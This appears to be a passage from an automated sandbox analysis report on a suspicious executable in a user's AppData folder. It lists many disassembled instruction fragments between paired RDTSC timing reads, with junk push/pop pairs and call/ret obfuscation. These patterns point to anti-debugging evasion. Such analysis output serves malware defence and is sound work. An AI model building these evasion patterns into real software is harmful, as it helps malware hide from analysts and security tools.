Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77ACB second address: C77ADF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77ADF second address: C77AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77AE3 second address: C77AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C77AE9 second address: C77AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7801D second address: C78021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C78021 second address: C78052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC3h 0x00000007 pushad 0x00000008 jmp 00007F0E948C9FC7h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C78052 second address: C78058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C782EA second address: C78309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E948C9FC2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F0E948C9FB6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C79E76 second address: C79E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C79F53 second address: C79F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C79F57 second address: C79F5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A043 second address: C7A049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A049 second address: C7A04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A5C9 second address: C7A5D3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0E948C9FB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A5D3 second address: C7A5D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A5D9 second address: C7A5DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7A7C6 second address: C7A7E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7AE9D second address: C7AF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F0E948C9FB8h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F0E948C9FBEh 0x00000016 nop 0x00000017 mov edi, 5D98FFADh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F0E948C9FB8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D1E14h], esi 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 jmp 00007F0E948C9FBCh 0x00000047 jp 00007F0E948C9FBCh 0x0000004d jnc 00007F0E948C9FB6h 0x00000053 popad 0x00000054 push eax 0x00000055 pushad 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7B954 second address: C7B958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7B958 second address: C7B95C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7B95C second address: C7B962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7C8F5 second address: C7C90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E948C9FC0h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7D412 second address: C7D418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7D1D3 second address: C7D1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7DE01 second address: C7DE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7DE05 second address: C7DE09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7EB1F second address: C7EB88 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0E94F51A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F0E94F51A48h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F0E94F51A48h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov esi, 5F741A67h 0x00000046 push 00000000h 0x00000048 pushad 0x00000049 sub dx, 3DC2h 0x0000004e or ecx, dword ptr [ebp+1247ABB6h] 0x00000054 popad 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7E869 second address: C7E86F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7EB88 second address: C7EB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7F65C second address: C7F660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C7F364 second address: C7F368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8469E second address: C846C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0E948C9FC8h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C846C1 second address: C846D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E94F51A51h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C846D7 second address: C846E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C393B9 second address: C393BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C393BF second address: C393E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007F0E948C9FBEh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C86D3B second address: C86D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C86D3F second address: C86D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F0E948C9FB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8AFA1 second address: C8AFA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8A07E second address: C8A082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8AFA7 second address: C8B000 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E94F51A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F0E94F51A48h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b jbe 00007F0E94F51A4Bh 0x00000031 mov edi, 2B6E0E33h 0x00000036 mov edi, dword ptr [ebp+12487F5Eh] 0x0000003c push eax 0x0000003d push esi 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8905A second address: C89068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F0E948C9FB6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8F686 second address: C8F6A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F0E94F51A48h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C8B22F second address: C8B234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C90628 second address: C9068E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F0E94F51A48h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D2603h], esi 0x0000002a mov bx, dx 0x0000002d push 00000000h 0x0000002f adc edi, 7F828764h 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D28EBh] 0x0000003d xchg eax, esi 0x0000003e jmp 00007F0E94F51A4Bh 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9165A second address: C9165F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9165F second address: C91669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C4349A second address: C434B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F0E948C9FB6h 0x0000000a jmp 00007F0E948C9FC3h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C434B7 second address: C434BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C434BB second address: C434E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007F0E948C9FD1h 0x00000016 push ecx 0x00000017 push edx 0x00000018 pop edx 0x00000019 jmp 00007F0E948C9FBFh 0x0000001e pop ecx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C94A14 second address: C94A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E94F51A57h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C94A30 second address: C94A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C94A3D second address: C94A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C971EE second address: C971F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9086C second address: C90873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C917DC second address: C917E1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C90873 second address: C90878 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C917E1 second address: C91804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E948C9FC8h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9911F second address: C99148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F0E94F51A4Ch 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C91804 second address: C91808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C99148 second address: C991A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F0E94F51A4Eh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov ebx, 10AE5533h 0x00000011 mov bx, B0ECh 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D1E39h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007F0E94F51A48h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b push ecx 0x0000003c pushad 0x0000003d popad 0x0000003e pop ecx 0x0000003f jmp 00007F0E94F51A51h 0x00000044 popad 0x00000045 push eax 0x00000046 pushad 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C991A9 second address: C991C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F0E948C9FBFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C91808 second address: C9189B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F0E94F51A4Ch 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f mov ebx, dword ptr [ebp+122D38AEh] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov ebx, dword ptr [ebp+122D3992h] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F0E94F51A48h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov eax, dword ptr [ebp+122D1195h] 0x00000049 je 00007F0E94F51A4Ch 0x0000004f mov edi, dword ptr [ebp+122D3ADEh] 0x00000055 push FFFFFFFFh 0x00000057 push 00000000h 0x00000059 push edi 0x0000005a call 00007F0E94F51A48h 0x0000005f pop edi 0x00000060 mov dword ptr [esp+04h], edi 0x00000064 add dword ptr [esp+04h], 00000018h 0x0000006c inc edi 0x0000006d push edi 0x0000006e ret 0x0000006f pop edi 0x00000070 ret 0x00000071 jmp 00007F0E94F51A4Ch 0x00000076 nop 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9189B second address: C918A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0E948C9FB6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9730C second address: C97310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C97310 second address: C97314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C97314 second address: C9731A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9731A second address: C973BE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0E948C9FB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0E948C9FB8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e cld 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F0E948C9FB8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov ebx, esi 0x00000052 mov ebx, 7AC4747Dh 0x00000057 mov eax, dword ptr [ebp+122D1759h] 0x0000005d cmc 0x0000005e push FFFFFFFFh 0x00000060 jmp 00007F0E948C9FBFh 0x00000065 nop 0x00000066 pushad 0x00000067 jnp 00007F0E948C9FBCh 0x0000006d je 00007F0E948C9FBCh 0x00000073 je 00007F0E948C9FB6h 0x00000079 popad 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d jc 00007F0E948C9FB8h 0x00000083 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C973BE second address: C973D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E94F51A51h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C973D3 second address: C973D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9E40E second address: C9E42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E94F51A58h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C9E42C second address: C9E443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E948C9FBEh 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3E469 second address: C3E470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3E470 second address: C3E47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C3E47B second address: C3E47F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CA21BD second address: CA21C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CA68FF second address: CA6909 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E94F51A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CA9009 second address: CA9044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E948C9FC6h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F0E948C9FC6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: CA9044 second address: CA9049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: C32AD2 second address: C32AE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
